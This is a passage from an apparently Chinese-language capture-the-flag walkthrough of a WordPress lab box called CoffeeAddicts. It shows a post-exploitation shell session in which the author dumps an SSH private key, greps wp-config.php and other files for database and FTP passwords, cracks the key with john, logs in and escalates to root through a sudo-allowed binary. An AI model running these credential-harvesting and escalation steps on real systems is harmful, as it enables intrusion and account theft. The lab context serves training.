drwxr-xr-x 4 root root 4096 Apr 6 2021 ..
-rw------- 1 badbyte badbyte 336 Apr 15 2021 .bash_history
-rw-r--r-- 1 badbyte badbyte 220 Apr 6 2021 .bash_logout
-rw-r--r-- 1 badbyte badbyte 3771 Apr 6 2021 .bashrc
drwx------ 2 badbyte badbyte 4096 Apr 6 2021 .cache
drwx------ 3 badbyte badbyte 4096 Apr 6 2021 .gnupg
-rw------- 1 root root 101 Apr 15 2021 .mysql_history
-rw-r--r-- 1 badbyte badbyte 807 Apr 6 2021 .profile
drwxr-xr-x 2 root root 4096 Apr 6 2021 .ssh
www-data@CoffeeAdicts:/home/badbyte$ cd .ssh
cd .ssh
www-data@CoffeeAdicts:/home/badbyte/.ssh$ ls -al
ls -al
total 12
drwxr-xr-x 2 root root 4096 Apr 6 2021 .
drwxr-xr-x 5 badbyte badbyte 4096 Apr 15 2021 ..
-rw-r--r-- 1 root root 1766 Apr 6 2021 id_rsa
www-data@CoffeeAdicts:/home/badbyte/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,62A318CC0E383648054CF4A211B5BC73
PaK8I9lUsr6gpOoNyTBkcg9NezPIKDfw8uuHWzUFOqtV8hkhgnx/8b9yjD5UQ2rX
nvOcdyVzhfpr293+48mmC1IHq3vMV3db9kqeIJ4LjG7A3yqjD6yw4Gy1NzibWrYT
......
RhjxPcPxNIaijkCTT4x5ZqkRSq3PRQwJ3O7ARKoXoLTScB8KSUhicmstC20ixRGx
svjCWYbFufc6ITOzNCCeM9gUS+WsPs5aJ+nfx5bj+ijSNSUH4UKpPFniHsVY2W8E
-----END RSA PRIVATE KEY-----
11.2.4、文件内容搜索(这个地方用处不大,上面信息足够提权)
- 获取
数据库
信息wordpressuser
:2a9798a9e678414e4aab71e2ba6a8dd9
- 发现疑似 FTP 密码:
[email protected]
www-data@CoffeeAdicts:/$ cd ~
cd ~
www-data@CoffeeAdicts:/var/www$ grep -ri -E 'DB_PASSWORD' *
grep -ri -E 'DB_PASSWORD' *
coffeeaddicts.thm/public_html/wordpress/wp-config.php:define( 'DB_PASSWORD', '2a9798a9e678414e4aab71e2ba6a8dd9' );
coffeeaddicts.thm/public_html/wordpress/wp-includes/load.php: $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
coffeeaddicts.thm/public_html/wordpress/wp-admin/setup-config.php: define( 'DB_PASSWORD', $pwd );
coffeeaddicts.thm/public_html/wordpress/wp-admin/setup-config.php: case 'DB_PASSWORD':
www-data@CoffeeAdicts:/var/www$ cat coffeeaddicts.thm/public_html/wordpress/wp-config.php
<ffeeaddicts.thm/public_html/wordpress/wp-config.php
......
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', '2a9798a9e678414e4aab71e2ba6a8dd9' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
......
www-data@CoffeeAdicts:/var/www$ grep -ri -E 'password' *
grep -ri -E 'password' *
......
coffeeaddicts.thm/public_html/wordpress/wp-admin/includes/class-ftp.php: $this->_password="[email protected]";
......
- 这里数据库就不看了,没啥东西
mysql -u wordpressuser -p2a9798a9e678414e4aab71e2ba6a8dd9
11.3、id_rsa 秘钥爆破
- 获取用户密码:
badbyte
:password
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# vim id_rsa
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ssh2john id_rsa > id_rsa.hash
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (id_rsa)
1g 0:00:00:00 DONE (2023-11-29 08:30) 5.000g/s 160.0p/s 160.0c/s 160.0C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
12、SSH登录(其实直接爆破密码也可以,毕竟是弱密码)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧
└─# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-140-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Nov 29 04:20:04 AKST 2023
System load: 0.02 Processes: 110
Usage of /: 43.3% of 7.81GB Users logged in: 0
Memory usage: 56% IP address for enp0s3: 192.168.56.44
Swap usage: 0%
19 packages can be updated.
11 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Last login: Thu Apr 15 15:56:55 2021 from 192.168.0.6
badbyte@CoffeeAdicts:~$
12.1、信息收集
badbyte@CoffeeAdicts:~$ history
1 exit
2 find /var/www/coffeeaddicts.thm/public_html/wordpress/ -type f -exec chmod 640 {} \;
3 find /var/www/coffeeaddicts.thm/public_html/wordpress/ -type d -exec chmod 750 {} \;
4 cd /var/www/coffeeaddicts.thm/public_html/
5 ls
6 ls -la
7 cd wordpress/
8 ls -la
9 chmod 660 wp-config.php
10 rm wp-config-sample.php
11 mysql
12 cd /opt/BadByte/
13 sudo ./shell
14 history
badbyte@CoffeeAdicts:~$ ls -al /opt/BadByte/shell
-rwxr-xr-x 1 root root 13816 Apr 6 2021 /opt/BadByte/shell
badbyte@CoffeeAdicts:~$ sudo -l
[sudo] password for badbyte:
Matching Defaults entries for badbyte on CoffeeAdicts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User badbyte may run the following commands on CoffeeAdicts:
(root) /opt/BadByte/shell
13、提权
badbyte@CoffeeAdicts:~$ sudo /opt/BadByte/shell
BadByte # SHELL=/bin/bash script -q /dev/null
root@CoffeeAdicts:~# cd /root
root@CoffeeAdicts:/root# ls -al
total 36
drwx------ 3 root root 4096 Apr 6 2021 .
drwxr-xr-x 23 root root 4096 Apr 6 2021 ..
-rw------- 1 root root 1071 Apr 6 2021 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 Apr 6 2021 .local
-rw------- 1 root root 142 Apr 6 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 20 Apr 6 2021 .python_history
-rw-r--r-- 1 root root 25 Apr 6 2021 root.txt
root@CoffeeAdicts:/root# cat root.txt
THM{im_the_shell_master}